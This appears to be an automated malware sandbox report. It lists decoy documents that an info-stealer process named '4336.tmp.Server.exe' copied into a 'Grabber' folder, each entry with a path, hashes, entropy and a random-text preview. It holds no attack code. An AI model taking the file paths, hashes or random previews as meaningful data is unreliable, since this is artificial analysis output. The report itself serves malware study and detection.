C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\ONBQCLYSPU\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
